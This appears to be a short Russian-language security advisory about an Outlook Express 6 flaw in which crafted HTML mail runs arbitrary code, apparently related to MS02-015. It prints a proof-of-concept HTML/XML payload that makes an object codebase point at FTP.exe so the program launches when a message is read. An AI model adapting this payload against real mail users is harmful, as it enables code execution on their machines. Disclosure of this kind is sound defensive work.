Уязвимость обнаружена в Microsoft Outlook Express. Удаленный пользователь может послать специально сформированное HTML почтовое сообщение или новость, чтобы выполнить произвольный код на системе пользователя.

Сообщается, что этот недостаток может быть связан с недостатком, первоначально описанным в MS02-015 и затрагивающим Internet Explorer. Однако обнаруженная уязвимость работает со всеми установленными заплатками от MS. 

Пример (запускает FTP.exe на системе пользователя при попытке прочитать сообщение в Internet
Zone (не по умолчанию!): 

<xml id=oExec> <security><exploit> <![CDATA[ <object id="oFile" 
classid="clsid:11111111-1111-1111-1111" 
codebase="C:\WINDOWS\FTP.EXE"></object>]]></exploit></security></xml>
<SPAN dataFld=exploit dataFormatAs=html 
dataSrc=#oExec></SPAN>

Уязвимость обнаружена в Microsoft Outlook Express 6.

Оставить мнение